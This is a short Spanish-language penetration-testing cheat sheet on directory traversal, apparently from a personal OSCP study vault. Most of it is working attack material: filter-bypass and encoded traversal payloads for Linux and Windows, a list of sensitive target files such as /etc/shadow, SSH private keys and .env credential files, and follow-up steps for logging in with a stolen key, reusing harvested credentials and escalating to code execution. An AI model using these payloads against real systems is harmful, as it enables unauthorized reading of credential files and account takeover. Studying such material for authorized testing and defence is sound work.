# Directory traversal > Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web. ## Dónde Parámetros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`. ## Payloads ``` ../../../../etc/passwd ....//....//....//etc/passwd (bypass de filtro que quita "../") %2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode) %252e%252e%252f (doble URL-encode) /etc/passwd (ruta absoluta directa) ..%c0%af..%c0%af (UTF-8 overlong) ``` ## Windows ``` ..\..\..\..\windows\win.ini ..\..\..\..\windows\system32\drivers\etc\hosts ``` ## Ficheros jugosos ``` /etc/passwd /etc/shadow /etc/hosts ~/.ssh/id_rsa → login SSH directo config.php web.config .env → credenciales de BD /var/www/html/... → código fuente (busca creds, segundos vectores) ``` ## Siguiente paso - Lees `id_rsa` → SSH como ese usuario. - Lees código/config → credenciales → Authentication attacks / reutilización. - Si además se **incluye** (PHP) → escala a LFI a RCE. Relacionado: LFI a RCE · Burp Repeater e Intruder · OSCP MOC